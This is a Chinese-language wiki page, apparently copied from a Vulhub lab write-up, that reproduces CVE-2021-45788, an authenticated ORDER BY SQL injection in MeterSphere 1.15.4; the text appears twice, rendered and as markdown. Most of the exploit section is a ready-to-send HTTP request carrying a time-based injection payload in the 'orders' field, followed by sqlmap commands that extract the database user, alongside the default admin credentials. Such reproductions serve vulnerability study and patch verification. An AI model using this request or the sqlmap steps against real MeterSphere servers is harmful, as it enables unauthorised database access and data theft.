fofamini-wiki

登录白背景

源码

MeterSphere v1.15.4 认证用户SQL注入漏洞 CVE-2021-45788

漏洞描述

MeterSphere是基于GPLv3协议的一站式的开源持续测试平台。在其1.15.4版本及以前，testcase相关API存在一处基于Order by的SQL注入漏洞。

参考链接：

https://github.com/metersphere/metersphere/issues/8651

环境搭建

Vulhub执行如下命令启动一个MeterSphere 1.15.4服务器：

docker compose up -d

MeterSphere初始化成功后，访问http://your-vps-ip:8081即可跳转到默认登录页面。

漏洞复现

使用账号admin和密码metersphere来登录用户界面。在http://your-vps-ip:8081/#/track/case/all创建一个新的测试用例：

然后，发送如下数据包测试 SQL 注入漏洞（替换 csrf token 和 session id）：

POST /test/case/list/1/10 HTTP/1.1
Host: your-vps-ip:8081
Content-Length: 3142
Accept: application/json, text/plain, */*
CSRF-TOKEN: [YOUR_CSRF_TOKEN]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: MS_SESSION_ID=[YOUR_SESSION_ID]
Connection: close

{"orders":[{"name":"name","type":",if(1=1,sleep(5),0)"}],"components":[{"key":"name","name":"MsTableSearchInput","label":"commons.name","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"tags","name":"MsTableSearchInput","label":"commons.tag","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"module","name":"MsTableSearchInput","label":"test_track.case.module","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"priority","name":"MsTableSearchSelect","label":"test_track.case.priority","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"P0","value":"P0"},{"label":"P1","value":"P1"},{"label":"P2","value":"P2"},{"label":"P3","value":"P3"}],"props":{"multiple":true}},{"key":"createTime","name":"MsTableSearchDateTimePicker","label":"commons.create_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"updateTime","name":"MsTableSearchDateTimePicker","label":"commons.update_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"creator","name":"MsTableSearchSelect","label":"api_test.creator","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"},{"label":"commons.adv_search.operators.current_user","value":"current user"}]},"options":{"url":"/user/list","labelKey":"name","valueKey":"id"},"props":{"multiple":true}},{"key":"reviewStatus","name":"MsTableSearchSelect","label":"test_track.review_view.execute_result","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"test_track.review.prepare","value":"Prepare"},{"label":"test_track.review.pass","value":"Pass"},{"label":"test_track.review.un_pass","value":"UnPass"}],"props":{"multiple":true}}],"filters":{"reviewStatus":["Prepare","Pass","UnPass"]},"planId":"","nodeIds":[],"selectAll":false,"unSelectIds":[],"selectThisWeedData":false,"selectThisWeedRelevanceData":false,"caseCoverage":null}

sleep(5) 成功执行：

保存请求包为req.txt，使用SQLMap来获取数据库用户信息：

python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3
python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3 --current-user

# MeterSphere v1.15.4 认证用户SQL注入漏洞 CVE-2021-45788

## 漏洞描述

MeterSphere是基于GPLv3协议的一站式的开源持续测试平台。在其1.15.4版本及以前，testcase相关API存在一处基于Order by的SQL注入漏洞。

参考链接：

- [https://github.com/metersphere/metersphere/issues/8651](https://github.com/metersphere/metersphere/issues/8651)

## 环境搭建

Vulhub执行如下命令启动一个MeterSphere 1.15.4服务器：

```
docker compose up -d
```

MeterSphere初始化成功后，访问`http://your-vps-ip:8081`即可跳转到默认登录页面。

![](images/MeterSphere%20v1.15.4%20认证用户SQL注入漏洞%20CVE-2021-45788/image-20240226112236979.png)

## 漏洞复现

使用账号`admin`和密码`metersphere`来登录用户界面。在`http://your-vps-ip:8081/#/track/case/all`创建一个新的测试用例：

![](images/MeterSphere%20v1.15.4%20认证用户SQL注入漏洞%20CVE-2021-45788/image-20240226112412195.png)

然后，发送如下数据包测试 SQL 注入漏洞（替换 csrf token 和 session id）：

```
POST /test/case/list/1/10 HTTP/1.1
Host: your-vps-ip:8081
Content-Length: 3142
Accept: application/json, text/plain, */*
CSRF-TOKEN: [YOUR_CSRF_TOKEN]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: MS_SESSION_ID=[YOUR_SESSION_ID]
Connection: close

{"orders":[{"name":"name","type":",if(1=1,sleep(5),0)"}],"components":[{"key":"name","name":"MsTableSearchInput","label":"commons.name","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"tags","name":"MsTableSearchInput","label":"commons.tag","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"module","name":"MsTableSearchInput","label":"test_track.case.module","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"priority","name":"MsTableSearchSelect","label":"test_track.case.priority","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"P0","value":"P0"},{"label":"P1","value":"P1"},{"label":"P2","value":"P2"},{"label":"P3","value":"P3"}],"props":{"multiple":true}},{"key":"createTime","name":"MsTableSearchDateTimePicker","label":"commons.create_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"updateTime","name":"MsTableSearchDateTimePicker","label":"commons.update_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"creator","name":"MsTableSearchSelect","label":"api_test.creator","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"},{"label":"commons.adv_search.operators.current_user","value":"current user"}]},"options":{"url":"/user/list","labelKey":"name","valueKey":"id"},"props":{"multiple":true}},{"key":"reviewStatus","name":"MsTableSearchSelect","label":"test_track.review_view.execute_result","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"test_track.review.prepare","value":"Prepare"},{"label":"test_track.review.pass","value":"Pass"},{"label":"test_track.review.un_pass","value":"UnPass"}],"props":{"multiple":true}}],"filters":{"reviewStatus":["Prepare","Pass","UnPass"]},"planId":"","nodeIds":[],"selectAll":false,"unSelectIds":[],"selectThisWeedData":false,"selectThisWeedRelevanceData":false,"caseCoverage":null}
```

sleep(5) 成功执行：

![](images/MeterSphere%20v1.15.4%20认证用户SQL注入漏洞%20CVE-2021-45788/image-20240226113439673.png)

保存请求包为req.txt，使用SQLMap来获取数据库用户信息：

```
python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3
python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3 --current-user
```

![](images/MeterSphere%20v1.15.4%20认证用户SQL注入漏洞%20CVE-2021-45788/image-20240226140921107.png)